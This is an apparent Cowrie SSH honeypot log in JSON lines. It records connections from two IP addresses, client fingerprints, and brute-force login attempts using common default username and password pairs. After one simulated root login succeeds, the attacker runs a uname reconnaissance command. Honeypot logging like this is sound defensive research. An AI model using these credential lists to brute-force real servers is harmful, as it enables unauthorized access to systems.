{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56120,"dst_ip":"1.2.3.4","dst_port":22,"session":"2dcf35a8f616","protocol":"ssh","message":"New connection: 212.227.235.229:56120 (1.2.3.4:22) [session: 2dcf35a8f616]","sensor":"my-vps","timestamp":"2025-08-31T04:47:13.940257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:47:14.066017Z","src_ip":"212.227.235.229","session":"2dcf35a8f616"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:47:14.181910Z","src_ip":"212.227.235.229","session":"2dcf35a8f616"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57932,"dst_ip":"1.2.3.4","dst_port":22,"session":"51330a7869a0","protocol":"ssh","message":"New connection: 212.227.235.229:57932 (1.2.3.4:22) [session: 51330a7869a0]","sensor":"my-vps","timestamp":"2025-08-31T04:47:14.315609Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"trustix","message":"login attempt [admin/trustix] failed","sensor":"my-vps","timestamp":"2025-08-31T04:47:16.501437Z","src_ip":"212.227.235.229","session":"2dcf35a8f616"}
{"eventid":"cowrie.login.failed","username":"centos","password":"centos","message":"login attempt [centos/centos] failed","sensor":"my-vps","timestamp":"2025-08-31T04:47:16.662589Z","src_ip":"212.227.125.160","session":"139b145f3b21"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:47:17.846102Z","src_ip":"212.227.235.229","session":"51330a7869a0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:47:17.875834Z","src_ip":"212.227.235.229","session":"51330a7869a0"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:47:18.253324Z","src_ip":"212.227.235.229","session":"2dcf35a8f616"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41910,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dbac64e7123","protocol":"ssh","message":"New connection: 212.227.125.160:41910 (1.2.3.4:22) [session: 0dbac64e7123]","sensor":"my-vps","timestamp":"2025-08-31T04:47:19.240156Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:47:19.796087Z","src_ip":"212.227.125.160","session":"0dbac64e7123"}
{"eventid":"cowrie.session.closed","duration":"20.4","message":"Connection lost after 20.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:47:19.984525Z","src_ip":"212.227.125.160","session":"139b145f3b21"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:47:20.701932Z","src_ip":"212.227.125.160","session":"0dbac64e7123"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47710,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ca263025fb4","protocol":"ssh","message":"New connection: 212.227.235.229:47710 (1.2.3.4:22) [session: 0ca263025fb4]","sensor":"my-vps","timestamp":"2025-08-31T04:47:21.485721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:47:21.486716Z","src_ip":"212.227.235.229","session":"0ca263025fb4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:47:21.610907Z","src_ip":"212.227.235.229","session":"0ca263025fb4"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"Admin@123456","message":"login attempt [postgres/Admin@123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:47:22.139997Z","src_ip":"212.227.235.229","session":"0ca263025fb4"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"root123","message":"login attempt [postgres/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:47:22.427959Z","src_ip":"212.227.125.160","session":"0dbac64e7123"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:47:23.263248Z","src_ip":"212.227.235.229","session":"0ca263025fb4"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:47:24.037923Z","src_ip":"212.227.125.160","session":"0dbac64e7123"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51386,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c2d9f26752e","protocol":"ssh","message":"New connection: 212.227.125.160:51386 (1.2.3.4:22) [session: 7c2d9f26752e]","sensor":"my-vps","timestamp":"2025-08-31T04:47:27.128619Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:47:27.129993Z","src_ip":"212.227.125.160","session":"7c2d9f26752e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:47:27.312653Z","src_ip":"212.227.125.160","session":"7c2d9f26752e"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890","message":"login attempt [root/1234567890] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:47:27.862774Z","src_ip":"212.227.125.160","session":"7c2d9f26752e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:47:28.243485Z","src_ip":"212.227.125.160","session":"7c2d9f26752e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:47:28.244164Z","src_ip":"212.227.125.160","session":"7c2d9f26752e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:47:28.428323Z","src_ip":"212.227.125.160","session":"7c2d9f26752e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:47:28.429542Z","src_ip":"212.227.125.160","session":"7c2d9f26752e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46208,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d6ea9a92609","protocol":"ssh","message":"New connection: 212.227.235.229:46208 (1.2.3.4:22) [session: 9d6ea9a92609]","sensor":"my-vps","timestamp":"2025-08-31T04:47:28.627680Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:47:29.060000Z","src_ip":"212.227.235.229","session":"9d6ea9a92609"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:47:29.199095Z","src_ip":"212.227.235.229","session":"9d6ea9a92609"}
{"eventid":"cowrie.login.failed","username":"rebecca","password":"rebecca","message":"login attempt [rebecca/rebecca] failed","sensor":"my-vps","timestamp":"2025-08-31T04:47:30.585005Z","src_ip":"212.227.235.229","session":"9d6ea9a92609"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44626,"dst_ip":"1.2.3.4","dst_port":22,"session":"78e10392a954","protocol":"ssh","message":"New connection: 212.227.125.160:44626 (1.2.3.4:22) [session: 78e10392a954]","sensor":"my-vps","timestamp":"2025-08-31T04:47:32.229744Z"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:47:32.396981Z","src_ip":"212.227.235.229","session":"9d6ea9a92609"}
{"eventid":"cowrie.login.failed","username":"centos","password":"centos","message":"login attempt [centos/centos] failed","sensor":"my-vps","timestamp":"2025-08-31T04:47:33.081703Z","src_ip":"212.227.235.229","session":"51330a7869a0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:47:33.785852Z","src_ip":"212.227.125.160","session":"2f63ab3bf828"}
{"eventid":"cowrie.session.closed","duration":180.5420265197754,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:47:33.789867Z","src_ip":"212.227.125.160","session":"2f63ab3bf828"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39548,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4e5b25b4d26","protocol":"ssh","message":"New connection: 212.227.125.160:39548 (1.2.3.4:22) [session: d4e5b25b4d26]","sensor":"my-vps","timestamp":"2025-08-31T04:47:35.027360Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:47:35.027997Z","src_ip":"212.227.125.160","session":"d4e5b25b4d26"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:47:35.217025Z","src_ip":"212.227.125.160","session":"d4e5b25b4d26"}
{"eventid":"cowrie.login.failed","username":"kubernetes","password":"kubernetes","message":"login attempt [kubernetes/kubernetes] failed","sensor":"my-vps","timestamp":"2025-08-31T04:47:35.785053Z","src_ip":"212.227.125.160","session":"d4e5b25b4d26"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:47:36.975770Z","src_ip":"212.227.125.160","session":"d4e5b25b4d26"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:47:44.143131Z","src_ip":"212.227.125.160","session":"78e10392a954"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:47:44.143898Z","src_ip":"212.227.125.160","session":"78e10392a954"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45764,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab8fb88af178","protocol":"ssh","message":"New connection: 212.227.125.160:45764 (1.2.3.4:22) [session: ab8fb88af178]","sensor":"my-vps","timestamp":"2025-08-31T04:47:52.378223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:47:52.379196Z","src_ip":"212.227.125.160","session":"ab8fb88af178"}
